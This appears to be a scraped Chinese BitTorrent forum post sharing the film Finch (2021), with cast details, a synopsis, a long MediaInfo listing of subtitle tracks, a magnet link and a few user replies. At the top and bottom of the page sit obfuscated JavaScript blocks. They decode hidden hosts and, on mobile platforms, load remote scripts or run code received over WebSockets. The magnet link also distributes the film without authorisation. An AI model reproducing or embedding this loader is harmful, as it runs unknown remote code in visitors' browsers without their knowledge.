芬奇[简繁字幕].Finch.2021.1080p.ATVP.WEB-DL.DDP5.1.Atmos.H.264 8.76GB

版主小s 26天前 611

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 芬奇 / 生化 / 人生 / BIOS / 芬奇的旅程

◎片 名 Finch

◎年 代 2021

◎产 地 英国 / 美国

◎类 别 剧情 / 科幻

◎语 言 英语

◎上映日期 2021-11-05(美国)

◎IMDb链接 https://www.imdb.com/title/tt3420504/

◎豆瓣链接 https://movie.douban.com/subject/26897885/

◎片 长 115分钟

◎导 演 米格尔·萨普什尼克 Miguel Sapochnik (id:1350650)

◎编 剧 克雷格·勒克 Craig Luck (id:1044399)

◎演 员 汤姆·汉克斯 Tom Hanks (id:1054450)

卡赖伯·兰德里·琼斯 Caleb Landry Jones (id:1235113)

洛拉·玛汀内斯-康宁安 Lora Martinez-Cunningham (id:1391559)

玛丽·瓦根曼 Marie Wagenman (id:1387543)

斯基特·乌尔里奇 Skeet Ulrich (id:1004631)

萨米拉·威利 Samira Wiley (id:1331705)

◎标 签 科幻 / 汤姆·汉克斯 / 美国 / 2021 / 美国电影 / Tom·Hanks / 电影 / 环球

◎简 介

汤姆·汉克斯将出演科幻新片《Bios》,《权力的游戏》《豪斯医生》导演Miguel Sapochnik执导,Craig Luck(《奇异博士》《碟中谍5》)和Ivor Powell(《异形》《银翼杀手》)操刀剧本。罗伯特·泽米吉斯、凯文·米舍担任制片人。设定在后世界末日的地球上,一位濒死的发明家打造了一个机器人,来保护他心爱的狗。在这一旅程中,机器人懂得了爱、友谊以及人类生活的意义。汉克斯将饰演发明家,预计2018年第一季度开拍。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 48509960973090566358991185674830802290 (0x247EADBB9B848569412E902F5456ED72)

  4. Complete name : Finch.2021.1080p.ATVP.WEB-DL.DDP5.1.Atmos.H.264-TEPES.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.75 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 10.8 Mb/s

  10. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 5 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 5 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 55 min

  22. Bit rate : 10.1 Mb/s

  23. Width : 1 920 pixels

  24. Height : 804 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.272

  33. Stream size : 8.13 GiB (93%)

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : E-AC-3 JOC

  44. Format/Info : Enhanced AC-3 with Joint Object Coding

  45. Commercial name : Dolby Digital Plus with Dolby Atmos

  46. Codec ID : A_EAC3

  47. Duration : 1 h 55 min

  48. Bit rate mode : Constant

  49. Bit rate : 768 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 635 MiB (7%)

  56. Language : English

  57. Service kind : Complete Main

  58. Default : Yes

  59. Forced : No

  60. Complexity index : 16

  61. Number of dynamic objects : 15

  62. Bed channel count : 1 channel

  63. Bed channel configuration : LFE


  64. Text #1

  65. ID : 3

  66. Format : UTF-8

  67. Codec ID : S_TEXT/UTF8

  68. Codec ID/Info : UTF-8 Plain Text

  69. Bit rate : 0 b/s

  70. Count of elements : 0

  71. Stream size : 0.00 Byte (0%)

  72. Title : Forced

  73. Language : English

  74. Default : Yes

  75. Forced : Yes


  76. Text #2

  77. ID : 4

  78. Format : UTF-8

  79. Codec ID : S_TEXT/UTF8

  80. Codec ID/Info : UTF-8 Plain Text

  81. Duration : 1 h 45 min

  82. Bit rate : 35 b/s

  83. Count of elements : 986

  84. Stream size : 27.5 KiB (0%)

  85. Language : English

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : UTF-8

  91. Codec ID : S_TEXT/UTF8

  92. Codec ID/Info : UTF-8 Plain Text

  93. Duration : 1 h 47 min

  94. Bit rate : 41 b/s

  95. Count of elements : 1210

  96. Stream size : 32.6 KiB (0%)

  97. Title : SDH

  98. Language : English

  99. Default : No

  100. Forced : No


  101. Text #4

  102. ID : 6

  103. Format : UTF-8

  104. Codec ID : S_TEXT/UTF8

  105. Codec ID/Info : UTF-8 Plain Text

  106. Duration : 1 h 53 min

  107. Bit rate : 48 b/s

  108. Count of elements : 1036

  109. Stream size : 40.5 KiB (0%)

  110. Language : Arabic

  111. Default : No

  112. Forced : No


  113. Text #5

  114. ID : 7

  115. Format : UTF-8

  116. Codec ID : S_TEXT/UTF8

  117. Codec ID/Info : UTF-8 Plain Text

  118. Duration : 1 h 53 min

  119. Bit rate : 51 b/s

  120. Count of elements : 1017

  121. Stream size : 42.8 KiB (0%)

  122. Language : Bulgarian

  123. Default : No

  124. Forced : No


  125. Text #6

  126. ID : 8

  127. Format : UTF-8

  128. Codec ID : S_TEXT/UTF8

  129. Codec ID/Info : UTF-8 Plain Text

  130. Duration : 1 h 53 min

  131. Bit rate : 30 b/s

  132. Count of elements : 1037

  133. Stream size : 25.1 KiB (0%)

  134. Title : Simplified

  135. Language : Chinese

  136. Default : No

  137. Forced : No


  138. Text #7

  139. ID : 9

  140. Format : UTF-8

  141. Codec ID : S_TEXT/UTF8

  142. Codec ID/Info : UTF-8 Plain Text

  143. Duration : 1 h 53 min

  144. Bit rate : 31 b/s

  145. Count of elements : 1039

  146. Stream size : 26.2 KiB (0%)

  147. Title : Traditional

  148. Language : Chinese

  149. Default : No

  150. Forced : No


  151. Text #8

  152. ID : 10

  153. Format : UTF-8

  154. Codec ID : S_TEXT/UTF8

  155. Codec ID/Info : UTF-8 Plain Text

  156. Duration : 1 h 53 min

  157. Bit rate : 32 b/s

  158. Count of elements : 996

  159. Stream size : 27.0 KiB (0%)

  160. Language : Czech

  161. Default : No

  162. Forced : No


  163. Text #9

  164. ID : 11

  165. Format : UTF-8

  166. Codec ID : S_TEXT/UTF8

  167. Codec ID/Info : UTF-8 Plain Text

  168. Duration : 1 h 53 min

  169. Bit rate : 31 b/s

  170. Count of elements : 852

  171. Stream size : 25.8 KiB (0%)

  172. Language : Danish

  173. Default : No

  174. Forced : No


  175. Text #10

  176. ID : 12

  177. Format : UTF-8

  178. Codec ID : S_TEXT/UTF8

  179. Codec ID/Info : UTF-8 Plain Text

  180. Duration : 1 h 47 min

  181. Bit rate : 37 b/s

  182. Count of elements : 1038

  183. Stream size : 29.2 KiB (0%)

  184. Language : German

  185. Default : No

  186. Forced : No


  187. Text #11

  188. ID : 13

  189. Format : UTF-8

  190. Codec ID : S_TEXT/UTF8

  191. Codec ID/Info : UTF-8 Plain Text

  192. Duration : 1 h 53 min

  193. Bit rate : 57 b/s

  194. Count of elements : 1019

  195. Stream size : 48.0 KiB (0%)

  196. Language : Greek

  197. Default : No

  198. Forced : No


  199. Text #12

  200. ID : 14

  201. Format : UTF-8

  202. Codec ID : S_TEXT/UTF8

  203. Codec ID/Info : UTF-8 Plain Text

  204. Duration : 1 h 53 min

  205. Bit rate : 34 b/s

  206. Count of elements : 1009

  207. Stream size : 28.3 KiB (0%)

  208. Title : Latin American

  209. Language : Spanish

  210. Default : No

  211. Forced : No


  212. Text #13

  213. ID : 15

  214. Format : UTF-8

  215. Codec ID : S_TEXT/UTF8

  216. Codec ID/Info : UTF-8 Plain Text

  217. Duration : 1 h 53 min

  218. Bit rate : 36 b/s

  219. Count of elements : 1000

  220. Stream size : 30.3 KiB (0%)

  221. Language : Spanish

  222. Default : No

  223. Forced : No


  224. Text #14

  225. ID : 16

  226. Format : UTF-8

  227. Codec ID : S_TEXT/UTF8

  228. Codec ID/Info : UTF-8 Plain Text

  229. Duration : 1 h 53 min

  230. Bit rate : 32 b/s

  231. Count of elements : 981

  232. Stream size : 27.3 KiB (0%)

  233. Language : Estonian

  234. Default : No

  235. Forced : No


  236. Text #15

  237. ID : 17

  238. Format : UTF-8

  239. Codec ID : S_TEXT/UTF8

  240. Codec ID/Info : UTF-8 Plain Text

  241. Duration : 1 h 53 min

  242. Bit rate : 32 b/s

  243. Count of elements : 998

  244. Stream size : 27.2 KiB (0%)

  245. Language : Finnish

  246. Default : No

  247. Forced : No


  248. Text #16

  249. ID : 18

  250. Format : UTF-8

  251. Codec ID : S_TEXT/UTF8

  252. Codec ID/Info : UTF-8 Plain Text

  253. Duration : 1 h 48 min

  254. Bit rate : 33 b/s

  255. Count of elements : 1150

  256. Stream size : 26.5 KiB (0%)

  257. Title : Canadian

  258. Language : French

  259. Default : No

  260. Forced : No


  261. Text #17

  262. ID : 19

  263. Format : UTF-8

  264. Codec ID : S_TEXT/UTF8

  265. Codec ID/Info : UTF-8 Plain Text

  266. Duration : 1 h 48 min

  267. Bit rate : 33 b/s

  268. Count of elements : 1150

  269. Stream size : 26.5 KiB (0%)

  270. Language : French

  271. Default : No

  272. Forced : No


  273. Text #18

  274. ID : 20

  275. Format : UTF-8

  276. Codec ID : S_TEXT/UTF8

  277. Codec ID/Info : UTF-8 Plain Text

  278. Duration : 1 h 53 min

  279. Bit rate : 46 b/s

  280. Count of elements : 1037

  281. Stream size : 39.1 KiB (0%)

  282. Language : Hebrew

  283. Default : No

  284. Forced : No


  285. Text #19

  286. ID : 21

  287. Format : UTF-8

  288. Codec ID : S_TEXT/UTF8

  289. Codec ID/Info : UTF-8 Plain Text

  290. Duration : 1 h 53 min

  291. Bit rate : 96 b/s

  292. Count of elements : 1039

  293. Stream size : 80.6 KiB (0%)

  294. Language : Hindi

  295. Default : No

  296. Forced : No


  297. Text #20

  298. ID : 22

  299. Format : UTF-8

  300. Codec ID : S_TEXT/UTF8

  301. Codec ID/Info : UTF-8 Plain Text

  302. Duration : 1 h 53 min

  303. Bit rate : 32 b/s

  304. Count of elements : 1022

  305. Stream size : 27.0 KiB (0%)

  306. Language : Hungarian

  307. Default : No

  308. Forced : No


  309. Text #21

  310. ID : 23

  311. Format : UTF-8

  312. Codec ID : S_TEXT/UTF8

  313. Codec ID/Info : UTF-8 Plain Text

  314. Duration : 1 h 53 min

  315. Bit rate : 32 b/s

  316. Count of elements : 1023

  317. Stream size : 27.1 KiB (0%)

  318. Language : Indonesian

  319. Default : No

  320. Forced : No


  321. Text #22

  322. ID : 24

  323. Format : UTF-8

  324. Codec ID : S_TEXT/UTF8

  325. Codec ID/Info : UTF-8 Plain Text

  326. Duration : 1 h 47 min

  327. Bit rate : 38 b/s

  328. Count of elements : 1025

  329. Stream size : 30.2 KiB (0%)

  330. Language : Italian

  331. Default : No

  332. Forced : No


  333. Text #23

  334. ID : 25

  335. Format : UTF-8

  336. Codec ID : S_TEXT/UTF8

  337. Codec ID/Info : UTF-8 Plain Text

  338. Duration : 1 h 53 min

  339. Bit rate : 35 b/s

  340. Count of elements : 949

  341. Stream size : 29.6 KiB (0%)

  342. Language : Japanese

  343. Default : No

  344. Forced : No


  345. Text #24

  346. ID : 26

  347. Format : UTF-8

  348. Codec ID : S_TEXT/UTF8

  349. Codec ID/Info : UTF-8 Plain Text

  350. Duration : 1 h 53 min

  351. Bit rate : 37 b/s

  352. Count of elements : 1038

  353. Stream size : 31.1 KiB (0%)

  354. Language : Korean

  355. Default : No

  356. Forced : No


  357. Text #25

  358. ID : 27

  359. Format : UTF-8

  360. Codec ID : S_TEXT/UTF8

  361. Codec ID/Info : UTF-8 Plain Text

  362. Duration : 1 h 53 min

  363. Bit rate : 33 b/s

  364. Count of elements : 1007

  365. Stream size : 27.9 KiB (0%)

  366. Language : Lithuanian

  367. Default : No

  368. Forced : No


  369. Text #26

  370. ID : 28

  371. Format : UTF-8

  372. Codec ID : S_TEXT/UTF8

  373. Codec ID/Info : UTF-8 Plain Text

  374. Duration : 1 h 53 min

  375. Bit rate : 35 b/s

  376. Count of elements : 1030

  377. Stream size : 29.4 KiB (0%)

  378. Language : Latvian

  379. Default : No

  380. Forced : No


  381. Text #27

  382. ID : 29

  383. Format : UTF-8

  384. Codec ID : S_TEXT/UTF8

  385. Codec ID/Info : UTF-8 Plain Text

  386. Duration : 1 h 53 min

  387. Bit rate : 33 b/s

  388. Count of elements : 1024

  389. Stream size : 27.6 KiB (0%)

  390. Language : Malay

  391. Default : No

  392. Forced : No


  393. Text #28

  394. ID : 30

  395. Format : UTF-8

  396. Codec ID : S_TEXT/UTF8

  397. Codec ID/Info : UTF-8 Plain Text

  398. Duration : 1 h 53 min

  399. Bit rate : 31 b/s

  400. Count of elements : 990

  401. Stream size : 26.5 KiB (0%)

  402. Language : Norwegian Bokmal

  403. Default : No

  404. Forced : No


  405. Text #29

  406. ID : 31

  407. Format : UTF-8

  408. Codec ID : S_TEXT/UTF8

  409. Codec ID/Info : UTF-8 Plain Text

  410. Duration : 1 h 53 min

  411. Bit rate : 32 b/s

  412. Count of elements : 995

  413. Stream size : 27.0 KiB (0%)

  414. Language : Dutch

  415. Default : No

  416. Forced : No


  417. Text #30

  418. ID : 32

  419. Format : UTF-8

  420. Codec ID : S_TEXT/UTF8

  421. Codec ID/Info : UTF-8 Plain Text

  422. Duration : 1 h 53 min

  423. Bit rate : 32 b/s

  424. Count of elements : 997

  425. Stream size : 27.0 KiB (0%)

  426. Language : Polish

  427. Default : No

  428. Forced : No


  429. Text #31

  430. ID : 33

  431. Format : UTF-8

  432. Codec ID : S_TEXT/UTF8

  433. Codec ID/Info : UTF-8 Plain Text

  434. Duration : 1 h 53 min

  435. Bit rate : 33 b/s

  436. Count of elements : 1021

  437. Stream size : 28.3 KiB (0%)

  438. Language : Portuguese

  439. Default : No

  440. Forced : No


  441. Text #32

  442. ID : 34

  443. Format : UTF-8

  444. Codec ID : S_TEXT/UTF8

  445. Codec ID/Info : UTF-8 Plain Text

  446. Duration : 1 h 53 min

  447. Bit rate : 32 b/s

  448. Count of elements : 1020

  449. Stream size : 27.3 KiB (0%)

  450. Title : Brazilian

  451. Language : Portuguese

  452. Default : No

  453. Forced : No


  454. Text #33

  455. ID : 35

  456. Format : UTF-8

  457. Codec ID : S_TEXT/UTF8

  458. Codec ID/Info : UTF-8 Plain Text

  459. Duration : 1 h 53 min

  460. Bit rate : 54 b/s

  461. Count of elements : 1044

  462. Stream size : 45.8 KiB (0%)

  463. Language : Russian

  464. Default : No

  465. Forced : No


  466. Text #34

  467. ID : 36

  468. Format : UTF-8

  469. Codec ID : S_TEXT/UTF8

  470. Codec ID/Info : UTF-8 Plain Text

  471. Duration : 1 h 53 min

  472. Bit rate : 32 b/s

  473. Count of elements : 1023

  474. Stream size : 27.3 KiB (0%)

  475. Language : Slovak

  476. Default : No

  477. Forced : No


  478. Text #35

  479. ID : 37

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 1 h 53 min

  484. Bit rate : 28 b/s

  485. Count of elements : 986

  486. Stream size : 24.1 KiB (0%)

  487. Language : Slovenian

  488. Default : No

  489. Forced : No


  490. Text #36

  491. ID : 38

  492. Format : UTF-8

  493. Codec ID : S_TEXT/UTF8

  494. Codec ID/Info : UTF-8 Plain Text

  495. Duration : 1 h 53 min

  496. Bit rate : 35 b/s

  497. Count of elements : 939

  498. Stream size : 29.2 KiB (0%)

  499. Language : Swedish

  500. Default : No

  501. Forced : No


  502. Text #37

  503. ID : 39

  504. Format : UTF-8

  505. Codec ID : S_TEXT/UTF8

  506. Codec ID/Info : UTF-8 Plain Text

  507. Duration : 1 h 53 min

  508. Bit rate : 110 b/s

  509. Count of elements : 1037

  510. Stream size : 92.0 KiB (0%)

  511. Language : Tamil

  512. Default : No

  513. Forced : No


  514. Text #38

  515. ID : 40

  516. Format : UTF-8

  517. Codec ID : S_TEXT/UTF8

  518. Codec ID/Info : UTF-8 Plain Text

  519. Duration : 1 h 53 min

  520. Bit rate : 93 b/s

  521. Count of elements : 1037

  522. Stream size : 77.6 KiB (0%)

  523. Language : Telugu

  524. Default : No

  525. Forced : No


  526. Text #39

  527. ID : 41

  528. Format : UTF-8

  529. Codec ID : S_TEXT/UTF8

  530. Codec ID/Info : UTF-8 Plain Text

  531. Duration : 1 h 53 min

  532. Bit rate : 75 b/s

  533. Count of elements : 1037

  534. Stream size : 63.2 KiB (0%)

  535. Language : Thai

  536. Default : No

  537. Forced : No


  538. Text #40

  539. ID : 42

  540. Format : UTF-8

  541. Codec ID : S_TEXT/UTF8

  542. Codec ID/Info : UTF-8 Plain Text

  543. Duration : 1 h 53 min

  544. Bit rate : 34 b/s

  545. Count of elements : 1020

  546. Stream size : 29.0 KiB (0%)

  547. Language : Turkish

  548. Default : No

  549. Forced : No


  550. Text #41

  551. ID : 43

  552. Format : UTF-8

  553. Codec ID : S_TEXT/UTF8

  554. Codec ID/Info : UTF-8 Plain Text

  555. Duration : 1 h 53 min

  556. Bit rate : 52 b/s

  557. Count of elements : 1035

  558. Stream size : 44.0 KiB (0%)

  559. Language : Ukrainian

  560. Default : No

  561. Forced : No


  562. Text #42

  563. ID : 44

  564. Format : UTF-8

  565. Codec ID : S_TEXT/UTF8

  566. Codec ID/Info : UTF-8 Plain Text

  567. Duration : 1 h 53 min

  568. Bit rate : 42 b/s

  569. Count of elements : 1023

  570. Stream size : 35.4 KiB (0%)

  571. Language : Vietnamese

  572. Default : No

  573. Forced : No


  574. Text #43

  575. ID : 45

  576. Format : UTF-8

  577. Codec ID : S_TEXT/UTF8

  578. Codec ID/Info : UTF-8 Plain Text

  579. Duration : 1 h 53 min

  580. Bit rate : 32 b/s

  581. Count of elements : 1039

  582. Stream size : 26.8 KiB (0%)

  583. Title : Cantonese

  584. Language : Chinese

  585. Default : No

  586. Forced : No




复制代码


TAGS 剧情 科幻

磁力链:
  • magnet:?xt=urn:btih:CA79F6C75A2AE160BC672F42303E779B11AFE525

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (3)
  • qtl123456 19天前
    2
    没字幕- -,
  • 版主小s 19天前
    3
    qtl123456 没字幕- -,
    这是mkv软字幕,在线播放基本不支持,请下载到本地使用播放器观看
  • qtl123456 19天前
    4
    好的谢谢。

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};